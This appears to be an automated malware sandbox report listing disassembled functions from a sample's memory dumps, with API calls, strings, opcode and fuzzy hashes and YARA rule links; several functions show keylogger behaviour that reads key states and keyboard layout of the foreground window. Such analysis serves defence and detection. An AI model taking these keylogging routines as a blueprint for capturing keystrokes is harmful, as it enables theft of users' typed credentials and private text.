                                                                                                                                                                                          • API String ID: 269201875-4251033865
                                                                                                                                                                                          • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                                                                                                                                          • Instruction ID: 65ae12a0bbb77d7111a4b2686b8bd43d871b0f7c6cb24c10c74fdbe4ddc521ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EE0E53290551203E675623E7E0D75F1E85BBC2772F114237F428963D1DFB449428A9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D45C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: $G
                                                                                                                                                                                          • API String ID: 269201875-4251033865
                                                                                                                                                                                          • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                                                                                          • Instruction ID: 9552a1c3b6874f3b35d82d20e642e8e1b80b78437438d76a6889578b38d52f9c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE02B32A0955203E679727D7D097AB0D467BC2331F104237F015963D1DFB48881C999
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00594BD3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                                          • String ID: NG$}E
                                                                                                                                                                                          • API String ID: 3519838083-2251168990
                                                                                                                                                                                          • Opcode ID: e7d40fc07d034a65060cda002aaf1e1ab51435aa3cf8f9fa75cdf93eab53bb7f
                                                                                                                                                                                          • Instruction ID: 3844c4a14d6efa5c7fb7a379758fd0200408d731ddbe07096c633af21b92c9e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e7d40fc07d034a65060cda002aaf1e1ab51435aa3cf8f9fa75cdf93eab53bb7f
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBF09A72E012199ACB14AF9E990ABAEFF78FF84720F10025BE81863281C7740E018AD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 1233B64B
                                                                                                                                                                                            • Part of subcall function 1233A3E0: GetForegroundWindow.USER32(?,?,123A50F0), ref: 1233A416
                                                                                                                                                                                            • Part of subcall function 1233A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 1233A422
                                                                                                                                                                                            • Part of subcall function 1233A3E0: GetKeyboardLayout.USER32(00000000), ref: 1233A429
                                                                                                                                                                                            • Part of subcall function 1233A3E0: GetKeyState.USER32(00000010), ref: 1233A433
                                                                                                                                                                                            • Part of subcall function 1233A3E0: GetKeyboardState.USER32(?,?,123A50F0), ref: 1233A43E
                                                                                                                                                                                            • Part of subcall function 1233A3E0: ToUnicodeEx.USER32(123A5144,0000005B,?,?,00000010,00000000,00000000), ref: 1233A461
                                                                                                                                                                                            • Part of subcall function 1233A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 1233A4C1
                                                                                                                                                                                            • Part of subcall function 1233A636: SetEvent.KERNEL32(?,?,00000000,1233B20A,00000000), ref: 1233A662
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                                          • String ID: [AltL]$[AltR]
                                                                                                                                                                                          • API String ID: 2738857842-2658077756
                                                                                                                                                                                          • Opcode ID: 48b3f90fb1748fadbea9d1de3d0ce0df700c83369ed6ae93f87a71d4885d3a64
                                                                                                                                                                                          • Instruction ID: 91462aa76307a1ad6391febe6cbe5bc0e2e0f0637add51286ad94d97b4d33bf2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b3f90fb1748fadbea9d1de3d0ce0df700c83369ed6ae93f87a71d4885d3a64
                                                                                                                                                                                          • Instruction Fuzzy Hash: 05E09B37B401101788AE323D5D5AAFD3E528742752B42024DE4434B789ED5A5F0683C2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409573 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 0040958C
                                                                                                                                                                                            • Part of subcall function 0040A78C: GetModuleFileNameA.KERNEL32(00000000,?,00000050,Semaphore error ,?), ref: 0040A7B5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • ?, xrefs: 00409573
                                                                                                                                                                                          • Error: system code page access failure; MBCS table not initialized, xrefs: 00409595
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileInfoModuleName
                                                                                                                                                                                          • String ID: ?$Error: system code page access failure; MBCS table not initialized
                                                                                                                                                                                          • API String ID: 3255085701-1671459530
                                                                                                                                                                                          • Opcode ID: 01c8b085e7354c6c1099acb78eb840c0f92e9d90cdbeeddb2b530a87d954120d
                                                                                                                                                                                          • Instruction ID: bfbfaf34202878cd0a96e321562c83a51502f64d6fd78a4a08c8a71b0c9657dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01c8b085e7354c6c1099acb78eb840c0f92e9d90cdbeeddb2b530a87d954120d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E0DF6280A64A2AD70221648C41AA77B5C8F0232AF1402B3E924E61D3E62D8E0083EB
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 1233B6A5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: State
                                                                                                                                                                                          • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                                          • API String ID: 1649606143-2446555240
                                                                                                                                                                                          • Opcode ID: f21b2f929f6c8e2d6f7c1629812bb4db8df759e3c5bc409d7a1e49115376e17f
                                                                                                                                                                                          • Instruction ID: 58f6baf7acb51db94e4274af01a63450c793b807b7f45f7d566a8a1904be2f01
                                                                                                                                                                                          • Opcode Fuzzy Hash: f21b2f929f6c8e2d6f7c1629812bb4db8df759e3c5bc409d7a1e49115376e17f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E0CD33A011111BC96E363D4F1D7FC2F168B82292F42020DF4838B69BED568B11D7C2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059F581 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005A1D0B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                                          • String ID: ,kG$0kG
                                                                                                                                                                                          • API String ID: 1881088180-2015055088
                                                                                                                                                                                          • Opcode ID: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                                                                                                                                          • Instruction ID: fa162afc169b4d982a46583850e549c3b03ac5f59b02308c78e51531900cb38f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55ded91c2411799c93627b1e27181bc6755349442ad5772556d3e3dbb5a5a571
                                                                                                                                                                                          • Instruction Fuzzy Hash: F3E09231104E229EC214A3A8954AF482BD5BB4B320B61412AE005D61C29B167881CA6C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040743C Relevance: 5.1, APIs: 4, Instructions: 120COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: dc8db77216e60d19f390f47f386b6f304388046b032368241243d8297744557c
                                                                                                                                                                                          • Instruction ID: 81a548d4465a01d89e05e935b5bf454d031e67836b0f148a885440edf5cc608a
                                                                                                                                                                                          • Opcode Fuzzy Hash: dc8db77216e60d19f390f47f386b6f304388046b032368241243d8297744557c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2731BB30B0C202ABD7209A698C90B677B65DB45324F24463BF925E73E1D679FC02C75A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004049EE Relevance: 5.1, Strings: 4, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XXTYPE.CPP$addr${0@${0@
                                                                                                                                                                                          • API String ID: 0-3664494418
                                                                                                                                                                                          • Opcode ID: f30a36144bb8e67d7eba4712a6663792dfa89ab3e2c662a94ad679e1016c065a
                                                                                                                                                                                          • Instruction ID: 0f30cb6d4a7d6e4f212690203bc932f43668cc5df22956ab8a5bf4b8ef741d28
                                                                                                                                                                                          • Opcode Fuzzy Hash: f30a36144bb8e67d7eba4712a6663792dfa89ab3e2c662a94ad679e1016c065a
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF116AB1A40206ABDB00CE95C941B6A77A9EB90314F24843AEE04673C1E779AD109F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404A90 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"Can't adjust class address (no base class entry found)"$Can't adjust class address (no base class entry found)$XXTYPE.CPP${0@
                                                                                                                                                                                          • API String ID: 0-3684756677
                                                                                                                                                                                          • Opcode ID: f9859a6ca1c982f611af58de7c52229e8db2feff2a37b002e116c0afe2703076
                                                                                                                                                                                          • Instruction ID: 723260384d7068f6cc0ec79a1caf53075dfb55dfbb91f14899e0998c661f9cee
                                                                                                                                                                                          • Opcode Fuzzy Hash: f9859a6ca1c982f611af58de7c52229e8db2feff2a37b002e116c0afe2703076
                                                                                                                                                                                          • Instruction Fuzzy Hash: F80171F160021477DF10DE56CC46BA737689B90754F148833FE04AA2C1F679EA60C6A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403C74 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: ((unsigned __far *)vftAddr)[-1] == 0$IS_CLASS(varType->tpMask)$XX.CPP$XX.CPP
                                                                                                                                                                                          • API String ID: 0-3977902411
                                                                                                                                                                                          • Opcode ID: 61763480cd6257e8be5fbce5af339ccb4a5bfa797259b2e01149b7d09099d994
                                                                                                                                                                                          • Instruction ID: ab0ab24eaa1a4e5197c49b6a77655fdb4534cdab7851837468e2e9b88c36b534
                                                                                                                                                                                          • Opcode Fuzzy Hash: 61763480cd6257e8be5fbce5af339ccb4a5bfa797259b2e01149b7d09099d994
                                                                                                                                                                                          • Instruction Fuzzy Hash: A201D8327443109BEB108E5AC8C9B18FB689B45725F148177E914BF3C9C2796D10C7A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%